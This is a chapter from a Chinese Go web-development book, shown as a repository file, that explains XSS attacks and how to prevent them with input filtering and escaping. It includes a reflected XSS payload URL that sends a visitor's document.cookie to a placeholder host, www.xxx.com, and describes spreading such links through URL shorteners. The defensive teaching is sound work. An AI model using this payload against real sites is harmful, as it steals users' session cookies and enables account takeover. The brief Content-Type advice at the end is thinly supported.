Files
build-web-application-with-…/9.3.md
2012-10-16 20:56:48 +08:00

4.6 KiB
Raw Blame History

##9.3 避免XSS攻击 随着互联网技术的发展现在的Web应用都含有大量的动态内容以提高用户体验。所谓动态内容就是根据用户环境和需要Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”Cross Site Scripting, 安全专家们通常将其缩写成 XSS的威胁而静态站点则完全不受其影响。

##什么是XSS XSS攻击跨站脚本攻击(Cross-Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞它允许恶意web用户将代码植入到提供给其它用户使用的页面中。不同于大多数攻击(一般只涉及攻击者和受害者)XSS涉及到三方即攻击者、客户端与Web应用。XSS的攻击目标是为了盗取客户端的cookie或者其他网站用于识别客户端身份的敏感信息。获取到合法用户的信息后攻击者甚至可以假冒最终用户与网站进行交互。

XSS目前主要的手段和目的如下

  • 盗用cookie获取敏感信息。
  • 利用植入Flash通过crossdomain权限设置进一步获取更高权限或者利用Java等得到类似的操作。
  • 利用iframe、frame、XMLHttpRequest或上述Flash等方式被攻击者用户的身份执行一些管理动作或执行一些一般的如发微博、加好友、发私信等操作前段时间新浪微博就遭遇过一次XSS。
  • 利用可被攻击的域受到其他域信任的特点,以受信任来源的身份请求一些平时不允许的操作,如进行不当的投票活动。
  • 在访问量极大的一些页面上的XSS可以攻击一些小型网站实现DDoS攻击的效果

##XSS的原理 XSS漏洞产生的原因是由于Web应用对用户提交请求的数据未做充分的检查过滤允许用户在提交的数据中掺入HTML代码(最主要的是“>”、“<”),然后未加编码地输出到第三方用户的浏览器,这些攻击者恶意提交代码会被受害用户的浏览器解释执行。

许多流行的留言本和论坛程序允许用户发表包含HTML和javascript的帖子。假设用户甲发表了一篇包含恶意脚本的帖子那么用户乙在浏览这篇帖子时恶意脚本就会执行盗取用户乙的cookie信息。有关攻击方法的详细情况请看如下例子

我们现在有一个网站根据参数输出用户的名称例如访问url"http://127.0.0.1/?name=astaxie",就会在浏览器输出如下信息:

hello astaxie

那么如果我们传递这样的url"http://127.0.0.1/?name=<script>alert('astaxie,xss')</script>",这个时候你就会发现你的浏览器跳出一个弹出框这说明站点已经存在了XSS漏洞那么用户如何来获取Cookie呢也是类似上面的代码输入如下的url"http://127.0.0.1/?name=<script>document.location='http://www.xxx.com/cookie?'%20+document.cookie</script>"这样就可以把当前的cookie发送到指定www.xxx.com站点。这样攻击者就可以把类似这样的url进行短域名服务缩短url然后把这些url通过途径传播开来被攻击用户一旦点击了这样的url相应数据就会被发送到收集cookie的脚本中。这样就获得了cookie信息然后利用Websleuth之类的工具来检查是否能盗取那个账户。

上面的这种漏洞叫做反射式漏洞其实XSS漏洞还有另外两种本地利用漏洞和存储式漏洞

  • 本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。
  • 存储式漏洞这是目前应用最为广泛而且有可能影响到Web服务器自身安全的漏洞。

##如何预防XSS 其实这个问题很简单坚决不要相信任何用户输入并过滤所有特殊字符。这样就能消灭绝大部分的XSS攻击。

目前防御XSS主要有如下几种方式

  • 过滤特殊字符

    避免XSS的方法之一主要是将用户所提供的内容进行过滤Go语言提供了HTML的过滤函数

    text/template包下面的HTMLEscapeString、JSEscapeString等函数

  • 使用HTTP头指定类型

    w.Header().Set("Content-Type","text/javascript")

    这样就可以让浏览器解析javascript代码而不会是html输出。 ##总结 通过上面的介绍我们发现了XSS漏洞是相当有危害的我们在开发我们的Web应用的时候一定要记住过滤数据特别是在输出到客户端之前这个是现在行之有效的防止XSS的手段。

LastModified

  • Id